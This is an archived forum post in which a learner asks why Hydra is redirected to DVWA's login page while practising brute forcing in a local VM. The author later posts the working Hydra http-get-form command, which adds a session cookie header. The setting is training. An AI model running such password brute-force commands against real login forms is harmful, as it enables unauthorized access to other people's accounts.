This forum is in archive mode. You will not be able to post new content.
Pages: [1]

Author Topic: Hydra and DVWA in a VM - redirect to login.php  (Read 1182 times)

0 Members and 2 Guests are viewing this topic.

Offline zoup

  • Serf
  • *
  • Posts: 29
  • Cookies: 3
  • I don't understand anything here !
    • View Profile
Hydra and DVWA in a VM - redirect to login.php
« on: August 30, 2015, 12:54:25 PM »
Hi there, i am using hydra and the damn vulnerable web application
to learn brute forcing with hydra.

The url i try to hack is:
/dvwa/vulnerabilities/brute/

The thing is i get an redirect to the main page where i must
authorize. I brute forced the login.php already with success.

Code: [Select]
[VERBOSE] Page redirected to http://192.168.56.101/dvwa/vulnerabilities/brute/../../login.php
So my question is:
How can i brute-force this webform when i have to first authorize
at the login.php ? I can't reach the brute page.

My commandline:

Code: [Select]
hydra -vV -l admin -P pw/25common.txt 192.168.56.101 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:password incorrect"
EDIT:
I figured it out. Of cos it was the cookie.

Code: [Select]
hydra -vV -l admin -P pw/25common.txt 192.168.56.101 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:password incorrect:H=Cookie: security=low; PHPSESSID=<phpsessid>"
« Last Edit: August 30, 2015, 01:46:39 PM by zoup »
Report to moderator   Logged
Pages: [1]
 



Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.